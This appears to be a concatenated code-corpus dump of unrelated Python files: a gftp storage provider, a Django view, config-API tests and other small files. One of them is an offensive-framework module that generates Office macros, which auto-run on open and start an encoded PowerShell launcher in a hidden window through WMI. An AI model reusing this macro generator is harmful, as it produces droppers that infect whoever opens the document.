'taxonId': ['biomaterial.content.biomaterial_core.ncbi_taxon_id', taxon_id],
'title': ['biomaterial.content.biomaterial_core.biomaterial_name']
}
no_release_date_spec = deepcopy(spec)
no_release_date_spec['releaseDate'] = ['biomaterial.submissionDate', format_date]
def convert(hca_data: dict):
project = hca_data.get('project')
use_spec = spec if project and project.get('releaseDate') else no_release_date_spec
return JsonMapper(hca_data).map(use_spec)
| 41.102041 | 116 | 0.733863 |
795ad28ccb9bfc7d6daa95e784797f21fd2511ce | 9,052 | py | Python | stats-backend/yapapi/yapapi/storage/gftp.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | null | null | null | stats-backend/yapapi/yapapi/storage/gftp.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | 4 | 2021-03-28T16:42:41.000Z | 2022-01-01T14:48:46.000Z | stats-backend/yapapi/yapapi/storage/gftp.py | golemfactory/golem-stats-backend | 95467749a13e4496032150cf08a9a3686ef213d3 | [
"MIT"
] | null | null | null | """
Golem File Transfer Storage Provider
"""
import asyncio
import contextlib
import hashlib
import json
import os
import sys
import tempfile
import uuid
from os import PathLike
from pathlib import Path
from types import TracebackType
from typing import List, Optional, cast, Union, AsyncIterator, Iterator, Type, Dict
import jsonrpc_base # type: ignore
from async_exit_stack import AsyncExitStack # type: ignore
from typing_extensions import Protocol, Literal, TypedDict, AsyncContextManager
from yapapi.storage import StorageProvider, Destination, Source, Content
import logging
_logger = logging.getLogger(__name__)
class PubLink(TypedDict):
"""GFTP linking information."""
file: str
"""file on local filesystem."""
url: str
"""GFTP url as which local files is exposed."""
CommandStatus = Literal["ok", "error"]
class GftpDriver(Protocol):
"""Golem FTP service API."""
async def version(self) -> str:
"""Gets driver version."""
pass
async def publish(self, *, files: List[str]) -> List[PubLink]:
"""Exposes local file as GFTP url.
`files`
: local files to be exposed
"""
pass
async def close(self, *, urls: List[str]) -> CommandStatus:
"""Stops exposing GFTP urls created by [publish(files=[..])](#publish)."""
pass
async def receive(self, *, output_file: str) -> PubLink:
"""Creates GFTP url for receiving file.
: `output_file` -
"""
pass
async def upload(self, *, file: str, url: str):
pass
async def shutdown(self) -> CommandStatus:
"""Stops GFTP service.
After shutdown all generated urls will be unavailable.
"""
pass
def service(debug=False) -> AsyncContextManager[GftpDriver]:
proc = __Process(_debug=debug)
return cast(AsyncContextManager[GftpDriver], proc)
class __Process(jsonrpc_base.Server):
def __init__(self, _debug: bool = False):
super().__init__()
self._debug = _debug
self._proc: Optional[asyncio.subprocess.Process] = None
self._lock = asyncio.Lock()
async def __aenter__(self) -> GftpDriver:
env = dict(os.environ, RUST_LOG="debug") if self._debug else None
self._proc = await asyncio.create_subprocess_shell(
"gftp server", stdout=asyncio.subprocess.PIPE, stdin=asyncio.subprocess.PIPE, env=env
)
return cast(GftpDriver, self)
async def __aexit__(self, exc_type, exc_val, exc_tb):
with contextlib.suppress(Exception):
await self._close()
async def _close(self):
if self._proc is None:
return
p: asyncio.subprocess.Process = self._proc
self._proc = None
with contextlib.suppress(Exception):
await cast(GftpDriver, self).shutdown()
async with self._lock:
if p.stdin:
await p.stdin.drain()
p.stdin.close()
try:
await asyncio.wait_for(p.wait(), 10.0)
return
except asyncio.TimeoutError:
pass
p.kill()
ret_code = await p.wait()
_logger.debug("GFTP server closed, code=%d", ret_code)
def __log_debug(self, msg_dir: Literal["in", "out"], msg: Union[bytes, str]):
if self._debug:
if isinstance(msg, bytes):
msg = msg.decode(encoding="utf-8")
stderr = sys.stderr
stderr.write("\n <= " if msg_dir == "in" else "\n => ")
stderr.write(msg)
stderr.flush()
async def send_message(self, message):
async with self._lock:
assert self._proc is not None
assert self._proc.stdin is not None
assert self._proc.stdout is not None
bytes = message.serialize() + "\n"
self.__log_debug("out", bytes)
self._proc.stdin.write(bytes.encode("utf-8"))
await self._proc.stdin.drain()
msg = await self._proc.stdout.readline()
self.__log_debug("in", msg)
if not msg:
sys.stderr.write("Please check if gftp is installed and is in your $PATH.\n")
sys.stderr.flush()
msg = json.loads(msg)
return message.parse_response(msg)
@contextlib.contextmanager
def _temp_file(temp_dir: Path) -> Iterator[Path]:
file_name = temp_dir / str(uuid.uuid4())
yield file_name
if file_name.exists():
os.remove(file_name)
class GftpSource(Source):
def __init__(self, length: int, link: PubLink):
self._len = length
self._link = link
@property
def download_url(self) -> str:
return self._link["url"]
async def content_length(self) -> int:
return self._len
class GftpDestination(Destination):
def __init__(self, _proc: GftpDriver, _link: PubLink) -> None:
self._proc = _proc
self._link = _link
@property
def upload_url(self) -> str:
return self._link["url"]
async def download_stream(self) -> Content:
file_path = Path(self._link["file"])
length = file_path.stat().st_size
async def chunks() -> AsyncIterator[bytes]:
with open(file_path, "rb") as f:
chunk = f.read(30_000)
while chunk:
yield chunk
chunk = f.read(30_000)
return Content(length=length, stream=chunks())
async def download_file(self, destination_file: PathLike):
if str(destination_file) == self._link["file"]:
return
return await super().download_file(destination_file)
class GftpProvider(StorageProvider, AsyncContextManager[StorageProvider]):
_temp_dir: Optional[Path]
_registered_sources: Dict[str, GftpSource]
def __init__(self, *, tmpdir: Optional[str] = None):
self.__exit_stack = AsyncExitStack()
self._temp_dir = Path(tmpdir) if tmpdir else None
self._registered_sources = dict()
self._process = None
async def __aenter__(self) -> StorageProvider:
self._temp_dir = Path(self.__exit_stack.enter_context(tempfile.TemporaryDirectory()))
process = await self.__get_process()
_ver = await process.version()
# TODO check version
assert _ver
return self
async def __aexit__(
self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> Optional[bool]:
await self.__exit_stack.aclose()
return None
def __new_file(self) -> Path:
temp_dir: Path = self._temp_dir or Path(
self.__exit_stack.enter_context(tempfile.TemporaryDirectory())
)
if not self._temp_dir:
self._temp_dir = temp_dir
return self.__exit_stack.enter_context(_temp_file(temp_dir))
async def __get_process(self) -> GftpDriver:
_debug = bool(os.getenv("DEBUG_GFTP"))
process = self._process or (await self.__exit_stack.enter_async_context(service(_debug)))
if not self._process:
self._process = process
return process
async def upload_stream(self, length: int, stream: AsyncIterator[bytes]) -> Source:
file_name = self.__new_file()
with open(file_name, "wb") as f:
async for chunk in stream:
f.write(chunk)
return await self.upload_file(file_name)
async def upload_file(self, path: os.PathLike) -> Source:
hasher = hashlib.sha3_256()
with open(path, "rb") as f:
while True:
bytes = f.read(4096)
if not bytes:
break
hasher.update(bytes)
digest = hasher.hexdigest()
if digest in self._registered_sources:
_logger.debug("File %s already published, digest: %s", path, digest)
return self._registered_sources[digest]
_logger.debug("Publishing file %s, digest: %s", path, digest)
process = await self.__get_process()
links = await process.publish(files=[str(path)])
length = Path(path).stat().st_size
assert len(links) == 1, "invalid gftp publish response"
source = GftpSource(length, links[0])
self._registered_sources[digest] = source
return source
async def new_destination(self, destination_file: Optional[PathLike] = None) -> Destination:
if destination_file:
if Path(destination_file).exists():
destination_file = None
output_file = str(destination_file) if destination_file else str(self.__new_file())
process = await self.__get_process()
link = await process.receive(output_file=output_file)
return GftpDestination(process, link)
def provider() -> AsyncContextManager[StorageProvider]:
return GftpProvider()
__all__ = ("service", "provider", "GftpDriver", "PubLink")
| 31.65035 | 97 | 0.61909 |
795ad3e84a08e5c184b7949043ae79ce9b8056b9 | 5,951 | py | Python | lib/payloads/windows/macro.py | fengjixuchui/invader | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | [
"MIT"
] | 2 | 2020-02-11T03:25:49.000Z | 2020-04-05T15:02:13.000Z | lib/payloads/windows/macro.py | fengjixuchui/invader | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | [
"MIT"
] | null | null | null | lib/payloads/windows/macro.py | fengjixuchui/invader | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | [
"MIT"
] | 1 | 2020-04-05T15:02:13.000Z | 2020-04-05T15:02:13.000Z | from lib.common import helpers
import random, string
class payload:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Macro',
'Author': ['@enigma0x3', '@harmj0y'],
'Description': ('Generates an office macro for Invader, compatible with office 97-2003, and 2007 file types.'),
'Comments': [
'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
]
}
# any options needed by the payload, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate payload for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the payload to generate.',
'Required' : True,
'Value' : 'powershell'
},
'payloadRetries' : {
'Description' : 'Times for the payload to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
payloadRetries = self.options['payloadRetries']['Value']
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.payloads.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, payloadRetries=payloadRetries)
Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
macro = "Sub Auto_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub AutoOpen()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Public Function "+Method+"() As Variant\n"
macro += payload
macro += "\tConst HIDDEN_WINDOW = 0\n"
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
macro += "End Function\n"
return macro
| 43.437956 | 257 | 0.513023 |
795ad4daf35ce77ee022b2fdc429018329cf70c1 | 129 | py | Python | backend/sandbox/todos/views/__init__.py | MMotionMan/django-edw | 0f686429d29e0f40409a3b2318664973b2844c08 | [
"BSD-3-Clause"
] | 4 | 2019-09-18T05:51:12.000Z | 2020-10-23T08:50:00.000Z | backend/sandbox/todos/views/__init__.py | Vvvnukova/django-edw | 18397c2e6e2d7ddebad4d83ffee16425e7ac4e9f | [
"BSD-3-Clause"
] | 10 | 2020-04-29T11:46:44.000Z | 2022-03-11T23:38:27.000Z | backend/sandbox/todos/views/__init__.py | Vvvnukova/django-edw | 18397c2e6e2d7ddebad4d83ffee16425e7ac4e9f | [
"BSD-3-Clause"
] | 13 | 2020-04-09T07:49:48.000Z | 2022-03-02T07:06:28.000Z | # -*- coding: utf-8 -*-
from django.shortcuts import render
def index(request):
return render(request, "todos/index.html")
| 18.428571 | 46 | 0.689922 |
795ad5c281d91f2346ecbfec55695f576e490a77 | 1,725 | py | Python | frappe/www/vineyard_List8.py | process-success/frappeModifyed | 17031bdf5bb81d335d47aa3028a36be288bd9a1a | [
"MIT"
] | null | null | null | frappe/www/vineyard_List8.py | process-success/frappeModifyed | 17031bdf5bb81d335d47aa3028a36be288bd9a1a | [
"MIT"
] | null | null | null | frappe/www/vineyard_List8.py | process-success/frappeModifyed | 17031bdf5bb81d335d47aa3028a36be288bd9a1a | [
"MIT"
] | 1 | 2018-03-21T18:34:08.000Z | 2018-03-21T18:34:08.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import getdate, nowdate
no_cache = 1
no_sitemap = 1
ROWS_PER_PAGE = 2
def get_context(context):
if (frappe.session.user == "Guest" or
frappe.db.get_value("User", frappe.session.user, "user_type")=="Website User"):
frappe.throw(_("You are not permitted to access this page."), frappe.PermissionError)
vineyards = []
joined = []
for acc in frappe.db.sql("select * from `tabvineyards` where true", as_dict=1):
vineyards.append(acc)
frappe.errprint(acc)
for acc in frappe.db.sql("select * from `tabWork Order` where true", as_dict=1):
joined .append(acc)
frappe.errprint(acc)
#for acc in frappe.db.sql("select * from `tabCrv_attendance` at JOIN (`tabvineyards` v, `tabWork Order` wo) on at.vineyard=v.name AND at.work_order=wo.name", as_dict=1):
# joined .append(acc)
# frappe.errprint(acc)
#for acc in frappe.db.sql("select wo.name, wo.subject, wo.project, wo.status, wo.priority, wo.exp_start_date, wo.expected_time, wo.task_weight, wo.exp_end_date, wo.progress, wo.description, wo.depends_on_tasks, wo.act_start_date, wo.actual_time, wo.act_end_date, wo.total_costing_amount, wo.total_expense_claim, wo.total_billing_amount, wo.review_date, wo.closing_date, wo.company, v.vineyard_name, v.address from `tabCrv_attendance` at JOIN (`tabvineyards` v, `tabWork Order` wo) on at.vineyard=v.name AND at.work_order=wo.name", as_dict=1):
# joined .append(acc)
# frappe.errprint(acc)
return {
"Svineyards" : vineyards,
"Sjoined " : joined,
"pages" : ROWS_PER_PAGE
} | 42.073171 | 544 | 0.728696 |
795ad5d4b27ec88fcab133fee96e864021f55ac1 | 192 | py | Python | nabu/processing/processors/__init__.py | rzcwade/nabu | 11238abd890b58a0f070c1886dc23b170b992b68 | [
"MIT"
] | 3 | 2019-02-15T03:28:42.000Z | 2019-06-29T14:39:58.000Z | nabu/processing/processors/__init__.py | rzcwade/nabu | 11238abd890b58a0f070c1886dc23b170b992b68 | [
"MIT"
] | null | null | null | nabu/processing/processors/__init__.py | rzcwade/nabu | 11238abd890b58a0f070c1886dc23b170b992b68 | [
"MIT"
] | 1 | 2019-04-19T06:58:47.000Z | 2019-04-19T06:58:47.000Z | '''@package processors
contains the data processors'''
from . import processor, processor_factory, audio_processor, text_processor,\
binary_processor, alignment_processor, textfile_processor
| 32 | 77 | 0.833333 |
795ad63b4c750ac7bb9bcd136f57a36aec51ad24 | 13,298 | py | Python | sdk/test/utils/config_api_helper/test_deliver.py | llnw/llnw-sdk-python | 0b3614e0e1f0b64c90d95ebd219646ea62d5efb4 | [
"Apache-2.0"
] | 5 | 2020-07-31T16:43:57.000Z | 2021-11-04T16:51:58.000Z | sdk/test/utils/config_api_helper/test_deliver.py | llnw/llnw-sdk-python | 0b3614e0e1f0b64c90d95ebd219646ea62d5efb4 | [
"Apache-2.0"
] | null | null | null | sdk/test/utils/config_api_helper/test_deliver.py | llnw/llnw-sdk-python | 0b3614e0e1f0b64c90d95ebd219646ea62d5efb4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from sdk.utils.config_api_helper.deilver import DeliverServiceInstanceObj, DeliverInstanceBaseException
shortname = "testname"
published_host = "www.example.com"
source_host = "www.example.origin.com"
published_protocol = "https"
source_protocol = "http"
profile_name = "Test_profile"
@pytest.fixture(scope="function")
def delivery_svc_instance():
"""Fixture for generating default DeliveryServiceInstance object"""
inst = DeliverServiceInstanceObj()
inst.generate_default(shortname, published_host, source_host,
profile_name, published_protocol, source_protocol)
return inst
@pytest.fixture(scope="function")
def add_protocol_set(delivery_svc_instance):
"""Fixture for adding protocolSet to DeliveryServiceInstance object"""
delivery_svc_instance.add_protocol_set()
@pytest.fixture(scope="function")
def add_option(delivery_svc_instance):
"""Fixture for adding option to DeliveryServiceInstance object"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param"],
published_protocol=published_protocol, source_protocol=source_protocol)
def test_generate_default():
"""Test: Generate default Delivery Service Instance object
Steps:
1. Generate default DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is generated as expected
"""
expected = {"accounts": [{"shortname": shortname}],
"body": {"protocolSets": [{"options": [],
"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol}],
"publishedHostname": published_host,
"publishedUrlPath": "",
"serviceKey": {"name": "delivery"},
"serviceProfileName": profile_name,
"sourceHostname": source_host,
"sourceUrlPath": ""}}
delivery_svc_inst = DeliverServiceInstanceObj()
delivery_svc_inst.generate_default(shortname, published_host, source_host,
profile_name, published_protocol, source_protocol)
assert expected == delivery_svc_inst
@pytest.mark.parametrize('pub,source', [(None, None), (published_protocol, source_protocol)])
def test_clear_protocol_set(delivery_svc_instance, pub, source):
"""Test: Clear protocolSets in Delivery Service Instance object
Steps:
1. Clear protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.clear_protocol_set(published_protocol=pub, source_protocol=source)
assert not delivery_svc_instance["body"]["protocolSets"]
@pytest.mark.parametrize('pub,source', [(published_protocol, None), (None, source_protocol)])
def test_neg_clear_protocol_set(delivery_svc_instance, pub, source):
"""Test: Clear protocolSets with exception in Delivery Service Instance object
Steps:
1. Clear protocolSets, do not set either published or source protocol
2. Check raised exception
Result:
OK: exception is raised
"""
with pytest.raises(DeliverInstanceBaseException):
delivery_svc_instance.clear_protocol_set(published_protocol=pub, source_protocol=source)
def test_add_protocol_set(delivery_svc_instance):
"""Test: Add protocolSet to Delivery Service Instance object
Steps:
1. Add additional protocolSet to DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_protocol_set(published_protocol="http", source_protocol="http",
published_port=80, source_port=8080,
options=[{"name": "some_opt", "parameters": ["some_param"]}])
assert 2 == len(delivery_svc_instance["body"]["protocolSets"])
prot_set = {"publishedProtocol": "http",
"sourceProtocol": "http",
"publishedPort": 80,
"sourcePort": 8080,
"options": [{"name": "some_opt", "parameters": ["some_param"]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][1]
def test_add_more_protocol_set_than_allowed(delivery_svc_instance, add_protocol_set):
"""Test: Add more protocolSets than allowed to Delivery Service Instance object
Steps:
1. Add 2 additional protocolSets to DeliverySvcInstance object
2. Check that only 2 protocolSets are present in generated object
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_protocol_set(published_protocol="http", source_protocol="http",
published_port=80, source_port=8080,
options=[{"name": "some_opt", "parameters": ["some_param"]}])
assert 2 == len(delivery_svc_instance["body"]["protocolSets"])
def test_modify_protocol_set(delivery_svc_instance):
"""Test: Modify protocolSet in Delivery Service Instance object
Steps:
1. Modify protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.modify_protocol_set(published_protocol=published_protocol, source_protocol=source_protocol,
options=[{"name": "some_opt", "parameters": ["some_param"]}])
assert 1 == len(delivery_svc_instance["body"]["protocolSets"])
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "some_opt", "parameters": ["some_param"]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_add_option(delivery_svc_instance):
"""Test: Add option to protocolSet in Delivery Service Instance object
Steps:
1. Add option to protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param", 3],
published_protocol=published_protocol, source_protocol=source_protocol)
assert 1 == len(delivery_svc_instance["body"]["protocolSets"])
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "some_opt", "parameters": ["some_param", 3]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_add_option_all_protocol_sets(delivery_svc_instance, add_protocol_set):
"""Test: Add option to all protocolSets in Delivery Service Instance object
Steps:
1. Add option to all protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param", 3])
assert 2 == len(delivery_svc_instance["body"]["protocolSets"])
option = [{"name": "some_opt", "parameters": ["some_param", 3]}]
for protocol_set in delivery_svc_instance["body"]["protocolSets"]:
assert option == protocol_set["options"]
def test_modify_options(delivery_svc_instance, add_option):
"""Test: Modify option in protocolSet in Delivery Service Instance object
Steps:
1. Modify option in protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.modify_options("some_opt", ["upd_param"], published_protocol, source_protocol)
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "some_opt", "parameters": ["upd_param"]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_modify_options_all_protocol_sets(delivery_svc_instance, add_protocol_set):
"""Test: Modify option in all protocolSets in Delivery Service Instance object
Steps:
1. Modify option in all protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param"])
delivery_svc_instance.modify_options("some_opt", ["upd_param"])
option = [{"name": "some_opt", "parameters": ["upd_param"]}]
for protocol_set in delivery_svc_instance["body"]["protocolSets"]:
assert option == protocol_set["options"]
def test_remove_option(delivery_svc_instance, add_option):
"""Test: Remove option from protocolSet in Delivery Service Instance object
Steps:
1. Remove option from protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.remove_option("some_opt", published_protocol, source_protocol)
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": []}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_remove_options_all_protocol_sets(delivery_svc_instance, add_protocol_set):
"""Test: Remove option from all protocolSets in Delivery Service Instance object
Steps:
1. Remove option from all protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param"])
delivery_svc_instance.remove_option("some_opt")
for protocol_set in delivery_svc_instance["body"]["protocolSets"]:
assert [] == protocol_set["options"]
@pytest.mark.parametrize('field', ['revision', 'status', 'shortname'])
def test_process_response(delivery_svc_instance, field):
"""Test: Convert API response to Delivery Service Instance object
Steps:
1. Transform API response to DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is generated as expected
"""
api_response = {"uuid": "78df6c87-b19f-42cb-bee7-263ec58e3950",
"isLatest": True,
"isEnabled": True,
"revision": {"createdBy": "test_user",
"createdDate": 1530022531900,
"versionNumber": 3},
"meta": {"manifestVersion": "4",
"serviceIdentifier": "deliverysvcinst",
"serviceKey": "delivery"},
"status": {"state": "COMPLETED"},
"accounts": [{"shortname": shortname}],
"shortname": shortname,
"body": {"protocolSets": [{"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "req_send_header",
"parameters": ["X-CDN", "llnw"]}]}],
"serviceProfileName": profile_name,
"publishedHostname": published_host,
"sourceHostname": source_host,
"publishedUrlPath": "/",
"sourceUrlPath": "/",
"serviceKey": {"name": "delivery"}}}
delivery_svc_instance.process_response(api_response)
assert field not in delivery_svc_instance
def test_profile_name(delivery_svc_instance):
"""Test: Set Profile's name in Delivery Service Instance object
Steps:
1. Set profile's name in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
upd_profile_name = "Test_profile_upd"
delivery_svc_instance.profile_name = upd_profile_name
assert upd_profile_name == delivery_svc_instance["body"]["serviceProfileName"]
assert delivery_svc_instance.profile_name == delivery_svc_instance["body"]["serviceProfileName"]
def test_shortname(delivery_svc_instance):
"""Test: Set shortname in Delivery Service Instance object
Steps:
1. Set shortname in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
upd_shortname = "updshortname"
delivery_svc_instance.shortname = upd_shortname
assert upd_shortname == delivery_svc_instance["accounts"][0]["shortname"]
assert delivery_svc_instance.shortname == delivery_svc_instance["accounts"][0]["shortname"]
| 41.55625 | 117 | 0.670176 |
795ad68aea468bcc49e49e06ac3a560f3ffb6350 | 1,052 | py | Python | training/biggraph_config.py | d4l3k/ourgraph | 9a0f706babf3696a4747d5d4882575ecd9374a63 | [
"MIT"
] | 2 | 2019-09-07T03:41:58.000Z | 2019-10-08T06:04:24.000Z | training/biggraph_config.py | d4l3k/ourgraph | 9a0f706babf3696a4747d5d4882575ecd9374a63 | [
"MIT"
] | null | null | null | training/biggraph_config.py | d4l3k/ourgraph | 9a0f706babf3696a4747d5d4882575ecd9374a63 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE.txt file in the root directory of this source tree.
entity_base = "data/ourgraph"
def get_torchbiggraph_config():
config = dict(
# I/O data
entity_path=entity_base,
edge_paths=[],
checkpoint_path='model/ourgraph',
# Graph structure
entities={
'user': {'num_partitions': 1},
'doc': {'num_partitions': 1},
},
relations=[
{
'name': 'l',
'lhs': 'user',
'rhs': 'doc',
'operator': 'complex_diagonal',
},
],
dynamic_relations=False,
# Scoring model
dimension=100,
global_emb=True,
comparator='dot',
# Training
num_epochs=50,
num_uniform_negs=1000,
loss_fn='softmax',
lr=0.001,
)
return config
| 21.916667 | 71 | 0.528517 |
795ad699fcea3df6d6adfa31e7e55b0c099d7149 | 394 | py | Python | heritago/heritago/wsgi.py | SWE574-Groupago/heritago | ec7d279df667a4f2c3560dfac4b5b17046163a95 | [
"MIT"
] | 6 | 2017-02-13T10:22:18.000Z | 2017-03-11T20:38:30.000Z | heritago/heritago/wsgi.py | SWE574-Groupago/heritago | ec7d279df667a4f2c3560dfac4b5b17046163a95 | [
"MIT"
] | 172 | 2017-02-12T21:07:27.000Z | 2017-06-08T10:46:58.000Z | heritago/heritago/wsgi.py | SWE574-RenameMe/heritago | ec7d279df667a4f2c3560dfac4b5b17046163a95 | [
"MIT"
] | 17 | 2017-02-13T08:29:37.000Z | 2017-06-29T14:43:53.000Z | """
WSGI config for heritago project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "heritago.settings")
application = get_wsgi_application()
| 23.176471 | 78 | 0.786802 |
795ad70fa8de3cf69e9b2d6b0cb6bd7614f5af02 | 4,560 | py | Python | postfix_incoming.py | FabianWe/mlmmj-docker | 08969e8b3fcf62777dbfe258edea5991844701ec | [
"MIT"
] | null | null | null | postfix_incoming.py | FabianWe/mlmmj-docker | 08969e8b3fcf62777dbfe258edea5991844701ec | [
"MIT"
] | null | null | null | postfix_incoming.py | FabianWe/mlmmj-docker | 08969e8b3fcf62777dbfe258edea5991844701ec | [
"MIT"
] | 1 | 2019-03-19T09:02:02.000Z | 2019-03-19T09:02:02.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Fabian Wenzelmann
# MIT License
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This script is used for accepting mails from postfix via a pipe transport.
